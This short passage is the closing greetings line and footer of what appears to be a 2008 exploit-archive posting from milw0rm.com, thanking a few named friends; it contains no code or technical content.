CcTero0liTi , GolD_M , n all my friends .. - ------------------------------------------------------------------------------------ - -# milw0rm.com [2008-11-26]